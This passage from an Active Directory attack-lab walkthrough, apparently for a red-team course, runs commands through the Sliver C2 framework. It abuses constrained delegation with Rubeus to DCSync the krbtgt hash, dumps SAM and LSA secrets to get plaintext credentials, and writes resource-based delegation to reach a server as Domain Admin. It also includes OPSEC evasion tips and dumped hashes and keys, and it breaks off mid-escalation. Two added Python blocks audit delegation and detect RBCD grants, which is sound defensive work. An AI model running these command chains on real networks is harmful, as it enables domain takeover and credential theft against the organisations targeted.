    userAccountControl       : WORKSTATION_TRUST_ACCOUNT, DONT_EXPIRE_PASSWD, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

[.....snip.....]



Using ADSearch
To enumerate computers with constrained delegation we can use ADSearch with a raw LDAP query
using the --search argument: (&(objectCategory=computer)(msds-allowedtodelegateto=*)). This LDAP
query searches for all computer objects with the msds-allowedtodelegateto property enabled.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json'

[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ______/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / /__/ / / /
/_/ |_/_____//____/\___/\__,_/\___/_/ /_/
Twitter: @tomcarver_
GitHub: @tomcarver16

[*] No domain supplied. This PCs domain will be used instead
[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[
  {
    "cn": "DCORP-ADMINSRV",
    "dnshostname": "dcorp-adminsrv.dollarcorp.moneycorp.local",
    "samaccountname": "DCORP-ADMINSRV$",
    "msds-allowedtodelegateto": [
      "TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL",
      "TIME/dcorp-DC"
    ]
  }
]
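The two ADSearch queries above only list objects with msds-allowedtodelegateto set. The following Python audit is an added example (not part of the lab manual, StandIn or ADSearch): it takes records shaped like the ADSearch --json output, extended with userAccountControl and the principals granted in msDS-AllowedToActOnBehalfOfOtherIdentity (assumed to be already resolved from the security descriptor to SIDs, as StandIn prints them), and rates every delegation type seen in these objectives, going beyond the two queries to cover unconstrained delegation and RBCD as well. The sample records are constructed from the lab objects shown in this section.

```python
"""Audit Kerberos delegation settings from an LDAP export (added example)."""
from dataclasses import dataclass

# userAccountControl bits that govern delegation (MS-SAMR / MS-ADTS values).
ACCOUNTDISABLE = 0x0002
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000                 # set on domain controllers
DONT_EXPIRE_PASSWD = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000              # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000    # constrained with protocol transition


@dataclass(frozen=True)
class Finding:
    account: str
    kind: str       # "unconstrained" | "constrained" | "rbcd"
    severity: str   # "high" | "medium" | "low"
    detail: str


def spn_host(spn: str) -> str:
    """Host part of 'service/host[:port]', lower-cased.

    The service class is ignored on purpose: it is not enforced during
    S4U2proxy, which is why a TIME/dcorp-dc entry can become an LDAP ticket
    via /altservice above. Only the target host matters for the risk rating.
    """
    host = spn.split("/", 1)[1] if "/" in spn else spn
    return host.split(":", 1)[0].lower()


def audit_delegation(records, dc_hosts):
    """Return a Finding for every risky delegation setting in records.

    records: dicts with samaccountname, useraccountcontrol (int),
             msds-allowedtodelegateto (list of SPNs or None) and
             msds-allowedtoactonbehalfofotheridentity (list of SIDs or None).
    dc_hosts: domain controller host names (short or FQDN).
    """
    dcs = {h.lower().split(".")[0] for h in dc_hosts}
    findings = []
    for r in records:
        name = r["samaccountname"]
        uac = int(r.get("useraccountcontrol") or 0)
        if uac & ACCOUNTDISABLE:
            continue  # a disabled account cannot obtain tickets
        is_dc = bool(uac & SERVER_TRUST_ACCOUNT)
        targets = r.get("msds-allowedtodelegateto") or []
        rbcd = r.get("msds-allowedtoactonbehalfofotheridentity") or []

        # Unconstrained delegation is expected on DCs; on any other host every
        # forwarded TGT (e.g. after a coerced DC authentication) is reusable.
        if uac & TRUSTED_FOR_DELEGATION and not is_dc:
            findings.append(Finding(name, "unconstrained", "high",
                "non-DC host keeps forwarded TGTs of every client that authenticates to it"))

        if targets:
            hosts = sorted({spn_host(t) for t in targets})
            hits_dc = any(h.split(".")[0] in dcs for h in hosts)
            if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
                # S4U2self works without the impersonated user's credentials.
                sev = "high" if hits_dc else "medium"
                why = "protocol transition enabled; SPN service class is not enforced"
                if hits_dc:
                    why += "; a DC is a target, so an alternate LDAP ticket permits DCSync"
            else:
                sev = "low"
                why = "Kerberos-only: needs a forwardable ticket from the impersonated user"
            findings.append(Finding(name, "constrained", sev, f"to {', '.join(hosts)}: {why}"))

        if rbcd:
            findings.append(Finding(name, "rbcd", "medium",
                "principals allowed to act on behalf of others to this host: " + ", ".join(rbcd)))
    return findings


def format_report(findings):
    """One line per finding, highest severity first, then by account name."""
    order = {"high": 0, "medium": 1, "low": 2}
    return "\n".join(f"[{f.severity.upper():6}] {f.account:16} {f.kind:13} {f.detail}"
                     for f in sorted(findings, key=lambda x: (order[x.severity], x.account)))


# Constructed from the lab objects in this section; UAC values combine the flags
# StandIn printed for each object (plus SERVER_TRUST_ACCOUNT for the DC itself).
SAMPLE_RECORDS = [
    {"samaccountname": "websvc",
     "useraccountcontrol": 0x200 | DONT_EXPIRE_PASSWD | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msds-allowedtodelegateto": ["CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL", "CIFS/dcorp-mssql"]},
    {"samaccountname": "DCORP-ADMINSRV$",
     "useraccountcontrol": WORKSTATION_TRUST_ACCOUNT | DONT_EXPIRE_PASSWD | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msds-allowedtodelegateto": ["TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL", "TIME/dcorp-DC"]},
    {"samaccountname": "DCORP-APPSRV$",
     "useraccountcontrol": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"samaccountname": "DCORP-MGMT$",
     "useraccountcontrol": WORKSTATION_TRUST_ACCOUNT | DONT_EXPIRE_PASSWD,
     "msds-allowedtoactonbehalfofotheridentity": ["S-1-5-21-719815819-3726368948-3917688648-5105"]},
    {"samaccountname": "DCORP-DC$",
     "useraccountcontrol": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
]
DC_HOSTS = {"dcorp-dc.dollarcorp.moneycorp.local"}

if __name__ == "__main__":
    print(format_report(audit_delegation(SAMPLE_RECORDS, DC_HOSTS)))
```

Feeding a real export is a matter of decoding the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor to SIDs first; the rating logic itself stays the same.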



Constrained Delegation computer abuse
Using Rubeus
We already have secrets of dcorp-adminsrv$ from the dcorp-adminsrv machine.

Since the SPN specified in S4U is not validated, we can abuse Constrained Delegation using the
hash of dcorp-adminsrv$ with Rubeus to gain access to an alternate service such as LDAP, since the TIME
service isn't very useful for command execution.

NOTE: It is advised to use the /aes256 hash instead of the standard /rc4 option for better OPSEC.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 's4u /user:dcorp-adminsrv$ /rc4:b5f451985fd34d58d5120816d31b5565 /impersonateuser:Administrator /msdsspn:time/dcorp-dc /altservice:ldap /ptt'

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 1f556f9d4e5fcab7f1bf4730180eb1efd0fadd5bb1b5c1e810149f9016a7284d
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\dcorp-adminsrv$'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIF4zCCBd+gAwIBB[.....snip.....]

[*] Action: S4U

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building S4U2self request for: 'dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):

      doIGAzCCBf+gAwIBBaE[.....snip.....]

[*] Impersonating user 'Administrator' to target SPN 'time/dcorp-dc.dollarcorp.moneycorp.LOCAL'
[*] Final ticket will be for the alternate service 'ldap'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building S4U2proxy request for service: 'time/dcorp-dc.dollarcorp.moneycorp.LOCAL'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] Substituting alternative service name 'ldap'
[*] base64(ticket.kirbi) for SPN 'ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL':

      doIHGTCCBxWgAwIBBa[.....snip.....]

[+] Ticket successfully imported!

Try and DCSync to validate the imported ticket.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync.exe.packed.dotnet.exe'

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986



Learning Objective 17
• Find a computer object in dcorp domain where we have Write permissions.

• Abuse the Write permissions to access that computer as Domain Admin.

Enumerate a Computer Object with Write permissions


Using StandIn
We first need to find a computer that has resource-based delegation/Write permissions enabled. We
can use StandIn to do this on the dcorp-stdX session. The --delegation argument enumerates all types of
delegation that are enabled.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --delegation

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[....snip....]

[?] Found 1 object(s) with resource-based constrained delegation..

[*] SamAccountName     : DCORP-MGMT$
    DistinguishedName  : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
    userAccountControl : WORKSTATION_TRUST_ACCOUNT, DONT_EXPIRE_PASSWD



Using Get-RBCD-Threaded
To enumerate RBCD rights/Write permissions we can use Get-RBCD-Threaded as follows.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Get-RBCD-Threaded.exe' '-u studentx -p 'JPIzbuWHdSfq9NFr' -d dollarcorp.moneycorp.local'

[*] Output:
This is the current domain: dollarcorp.moneycorp.local
The LDAP search base is LDAP://DC=dollarcorp,DC=moneycorp,DC=local
LDAP://dollarcorp.moneycorp.local:636
You want to search all trusted domains and forests!
The current forest is: moneycorp.local

[snip]

Enumerate ACLs...
Checking for ACLs with RBCD...
Number of possible RBCD ACLs: 1
RBCD ACL:
Source: ciadmin
Source Domain: dollarcorp.moneycorp.local
Destination: dcorp-mgmt.dollarcorp.moneycorp.local
Privilege: GenericWrite

Execution time = 2.4678037 seconds

Get-RBCD-Threaded:
-d|-domain FQDN domain to authentication to

It was found that dcorp\ciadmin has GenericWrite permissions over dcorp-mgmt.



Abuse a Computer Object with Write permissions
Using StandIn, PEzor, Rubeus
Dumping LSASS secrets on dcorp-ci, we find dcorp\ciadmin plaintext credentials. To do so, we first
impersonate the Domain Admin found earlier using Rubeus as follows.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /show /ptt'

[*] Output:

[*] Action: Ask TGT

[*] Showing process : True
[*] Username        : CMXYK90V
[*] Domain          : WKIESTM5
[*] Password        : HAB7FAYP
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 2520
[+] LUID            : 0xaab77

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash: 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 699255
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGAjCCBf6gAwIBB[snip]

[*] Target LUID: 0xaab77
[+] Ticket successfully imported!

  ServiceName           :  krbtgt/DOLLARCORP.MONEYCORP.LOCAL
  ServiceRealm          :  DOLLARCORP.MONEYCORP.LOCAL
  UserName              :  svcadmin
  UserRealm             :  DOLLARCORP.MONEYCORP.LOCAL
  StartTime             :  1/15/2024 6:30:41 AM
  EndTime               :  1/15/2024 4:30:41 PM
  RenewTill             :  1/22/2024 6:30:41 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  aes256_cts_hmac_sha1
  Base64(key)           :  fbhvuQhtRTYbD483RPrHQxsjm6hPnOhjtdU2YbhrfLk=
  ASREP (key)           :  6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

Remotely dumping the SAM using sharpsecdump, we find dcorp\ciadmin credentials in plaintext. We can use
these credentials to carry out the RBCD attack.

[server] sliver (dcorp-std_https) > sharpsecdump -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 60 '' "-target=dcorp-ci"

[*] sharpsecdump output:

[*] RemoteRegistry service started on dcorp-ci
[*] Parsing SAM hive on dcorp-ci
[*] Parsing SECURITY hive on dcorp-ci
[*] Sucessfully cleaned up on dcorp-ci
---------------Results from dcorp-ci---------------
[*] SAM hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:deaa870c264c682aa1fbfc31ebe678a2
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[*] Cached domain logon information(domain/username:hash)
DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
[*] LSA Secrets
[*] $MACHINE.ACC
dollarcorp.moneycorp.local\dcorp-ci$:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3
[*] DPAPI_SYSTEM
dpapi_machinekey:4796c1a459d09e880ee84dc5958f1cdca366c808
dpapi_userkey:eba6b8fb6245f03382bff91e8fb6fd323080b80c
[*] NL$KM
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] _SC_jenkins
dcorp\ciadmin:*ContinuousIntrusion123
---------------Script execution completed---------------

To abuse RBCD, we need a computer object to which delegation rights can be granted. Creating a new computer isn't as
OPSEC safe as using an already compromised machine account. In this case we use the dcorp-stdX
machine account.

Get the SID of the dcorp-stdX machine account using StandIn.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --sid dcorp-studentX$

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[?] Object : CN=DCORP-STUDENTX
    Path   : LDAP://CN=DCORP-STUDENTX,CN=Computers,DC=dollarcorp,DC=moneycorp,DC=local

[+] User : DOLLARCORP.MONEYCORP.LOCAL\DCORP-STUDENTX$
    SID  : S-1-5-21-719815819-3726368948-3917688648-5105

Next use this SID to set RBCD delegation as dcorp\ciadmin over the dcorp-stdX machine account using
StandIn.

NOTE: If we do not have explicit credentials, it is possible to complete this attack using other prior
impersonation techniques as showcased in other objectives.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' '--computer dcorp-mgmt --sid "S-1-5-21-719815819-3726368948-3917688648-5105" --user ciadmin --pass "*ContinuousIntrusion123" --domain dollarcorp.moneycorp.local'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[?] Object : CN=DCORP-MGMT
    Path   : LDAP://CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity

Switch to the elevated persistent AbyssWebserver session.


[server] sliver (dcorp-std_https) > sessions -i b9cd498e

[*] Active session dcorp-std_https (b9cd498e)

[server] sliver (dcorp-std_https) > ps

 Pid    Ppid   Owner                          Arch     Executable            Session
====== ====== ============================== ======== ===================== =========
[.........snip.......]
 2160   584    NT AUTHORITY\SYSTEM            x86_64   abyssws.exe           0

Dump AES keys using the mimikatz-ekeys.exe.packed.dotnet.exe binary in the elevated session as follows.

[server] sliver (dcorp-std_https) > execute-assembly -P 2160 -p 'C:\windows\system32\wbem\WmiApSrv.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.packed.dotnet.exe'

[*] Output:

[........snip........]

Authentication Id : 0 ; 44045 (00000000:0000ac0d)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/19/2024 3:58:54 AM
SID               : S-1-5-90-0-1

         * Username : DCORP-STUDENTX$
         * Domain   : dollarcorp.moneycorp.local
         * Password : #pn3 0/L.zNUNUZ:wHgzL6022d=fTSJKtXaUxBP%B@<`0JDuSf,W5q"O@fpB!(c<1BXAvL-jo<nW`*DY!Q%$[o#$cLDgh/a2OOx,P1inI'V_7T^:5ZrZuIz/
         * Key List :
           des_cbc_md4       29a28164bb26ba3a79408bb1248bceee76c5bb8cb777bddeaf0f67500bbacb05
           des_cbc_md4       d642f13e46cce541c9c0096311ee28a3
           des_cbc_md4       3183f0e26d1bdd471b68b6c9edd873b5
           des_cbc_md4       3183f0e26d1bdd471b68b6c9edd873b5
           des_cbc_md4       3183f0e26d1bdd471b68b6c9edd873b5
           des_cbc_md4       3183f0e26d1bdd471b68b6c9edd873b5
           des_cbc_md4       3183f0e26d1bdd471b68b6c9edd873b5

Switch back to the primary dcorp\studentX session and use Rubeus along with the dcorp-stdX$ AES256 key to abuse the RBCD rights and access CIFS on dcorp-mgmt as a Domain Administrator - dcorp\administrator.
[server] sliver (dcorp-std_https) > sessions -i 82c659f8
[*] Active session dcorp-std_https (82c659f8)

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 's4u /user:dcorp-studentX$ /aes256:29a28164bb26ba3a79408bb1248bceee76c5bb8cb777bddeaf0f67500bbacb05 /msdsspn:cifs/dcorp-mgmt /impersonateuser:administrator /domain:dollarcorp.moneycorp.local /ptt'

[*] rubeus output:

[*] Action: S4U
[*] Using rc4_hmac hash: 22abe627783078e62462354b2e4d6813
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\dcorp-stdX$'
[+] TGT request successful!

[*] base64(ticket.kirbi):

doIFqjCCBaagAw[..............snip..........]
[*] Action: S4U
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building S4U2self request for: 'dcorp-stdX$@DOLLARCORP.MONEYCORP.LOCAL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'dcorp-stdX$@DOLLARCORP.MONEYCORP.LOCAL'

[*] base64(ticket.kirbi):

doIF/zCCBfugAw[..............snip..........]

[*] Impersonating user 'administrator' to target SPN 'cifs/dcorp-mgmt.dollarcorp.moneycorp.local'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building S4U2proxy request for service: 'cifs/dcorp-mgmt.dollarcorp.moneycorp.local'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dcorp-mgmt.dollarcorp.moneycorp.local':
doIHHjCCBxqgAwIBBa[..............snip..........]

Access the filesystem of dcorp-mgmt as the domain administrator - dcorp\administrator.

[server] sliver (dcorp-std_https) > ls '\\dcorp-mgmt\c$'

\\dcorp-mgmt\c$\ (13 items, 384.4 MiB)
======================================
-r--r--r-- bootmgr 375.3 KiB Sat Jul 16 06:10:17 -0700 2021
-rw-rw-rw- BOOTNXT 1 B Sat Jul 16 06:10:17 -0700 2021
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Thu Feb 14 07:51:03 -0700 2024
-rw-rw-rw- pagefile.sys 384.0 MiB Sat May 07 09:40:52 -0700 2024

[..........snip.......]

Remove the RBCD rights using StandIn as follows.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' '--computer dcorp-mgmt --remove --user ciadmin --pass "*ContinuousIntrusion123" --domain dollarcorp.moneycorp.local'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[?] Object : CN=DCORP-MGMT
Path : LDAP://CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
[+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed..

Purge all tickets using Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

[*] rubeus output:

[*] Action: Purge Tickets
Luid: 0x0
[+] Tickets successfully purged!
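
As an added defensive example (not part of the lab or of StandIn/Rubeus): the StandIn step above writes a security descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity, and when Directory Service Changes auditing and an object SACL are configured the domain controller records that write as event 5136. The code below decodes such a self-relative descriptor to list the trustee SIDs that were granted delegation and flags any not on an approved list; the 5136 records, the placeholder RID 1122 standing in for dcorp-studentX$, and the hex-encoded AttributeValue are constructed assumptions.

```python
import struct

# SECURITY_DESCRIPTOR control bits and ACE type used below (Windows SDK values).
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
# Constructed full-control mask for the sample descriptor; real values may differ.
FULL_CONTROL = 0x000F01FF

def parse_sid(buf, off):
    """Decode a binary SID at buf[off:]; return (SID string, bytes consumed)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count

def build_sid(sid):
    """Inverse of parse_sid, used only to construct the sample descriptor."""
    parts = sid.split("-")
    subs = [int(p) for p in parts[3:]]
    return (bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def build_rbcd_descriptor(trustee_sids, owner="S-1-5-32-544"):
    """Constructed self-relative descriptor: owner + one ACCESS_ALLOWED ACE per trustee."""
    aces = b""
    for sid in trustee_sids:
        sid_b = build_sid(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    owner_b = build_sid(owner)
    # 20-byte header; owner at offset 20, no group/SACL, DACL directly after the owner SID
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         20, 0, 0, 20 + len(owner_b))
    return header + owner_b + acl

def trustees_from_descriptor(sd):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the DACL, i.e. the accounts
    allowed to act on behalf of other identities against this computer object."""
    rev, _, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []  # no DACL: nobody is allowed to delegate
    _, _, _size, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, trustees = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, _mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            trustees.append(parse_sid(sd, pos + 8)[0])
        pos += ace_size
    return trustees

# Constructed 5136 records (field names as in the Windows event XML). Assumption: the
# descriptor value was captured as a hex string. RID 1122 is a placeholder for the
# dcorp-studentX$ machine account; the DN is the one StandIn reports above.
STUDENT_SID = "S-1-5-21-719815819-3726368948-3917688648-1122"
MGMT_DN = "CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local"
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "ciadmin", "ObjectDN": MGMT_DN,
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674",  # %%14674 = value added, %%14675 = value deleted
     "AttributeValue": build_rbcd_descriptor([STUDENT_SID]).hex()},
    {"EventID": 5136, "SubjectUserName": "ciadmin", "ObjectDN": MGMT_DN,
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674",
     "AttributeValue": "patched"},
]

def find_rbcd_grants(events, approved_trustees=frozenset()):
    """Alert on every delegation trustee newly written to msDS-AllowedToActOnBehalfOfOtherIdentity
    that is not on the approved list. Returns (object DN, who changed it, trustee SID) tuples."""
    hits = []
    for ev in events:
        if (ev.get("EventID") != 5136
                or ev.get("AttributeLDAPDisplayName") != "msDS-AllowedToActOnBehalfOfOtherIdentity"
                or ev.get("OperationType") != "%%14674"):
            continue
        for sid in trustees_from_descriptor(bytes.fromhex(ev["AttributeValue"])):
            if sid not in approved_trustees:
                hits.append((ev["ObjectDN"], ev["SubjectUserName"], sid))
    return hits

if __name__ == "__main__":
    for dn, actor, sid in find_rbcd_grants(SAMPLE_EVENTS):
        print("RBCD grant on %s by %s -> trustee %s" % (dn, actor, sid))
```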

Learning Objective 18
Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local, using the domain trust key.

Escalate to Enterprise Admin using the domain trust key

Using PEzor & Rubeus
We can use the cross-trust key, which can be retrieved using SharpKatz, to move laterally from dollarcorp to the moneycorp domain.

To do so, we first impersonate the Domain Admin found earlier using Rubeus as follows.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /show /ptt'

[*] Output:

[*] Action: Ask TGT

[*] Showing process : True
[*] Username : CMXYK90V
[*] Domain : WKIESTM5
[*] Password : HAB7FAYP
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2520
[+] LUID : 0xaab77

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash: 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 699255
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBB[snip]

[*] Target LUID: 0xaab77
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 1/15/2024 6:30:41 AM
EndTime : 1/15/2024 4:30:41 PM
RenewTill : 1/22/2024 6:30:41 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : fbhvuQhtRTYbD483RPrHQxsjm6hPnOhjtdU2YbhrfLk=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

Use PEzor in a new Ubuntu WSL prompt to create a compatible .NET mimikatz binary that performs a DCSync and retrieves the dcorp\mcorp$ trust key, passing the arguments "lsadump::dcsync /user:dcorp\mcorp$ /domain:dollarcorp.moneycorp.local" "exit".

wsluser@dcorp-studentX:~$ sudo su
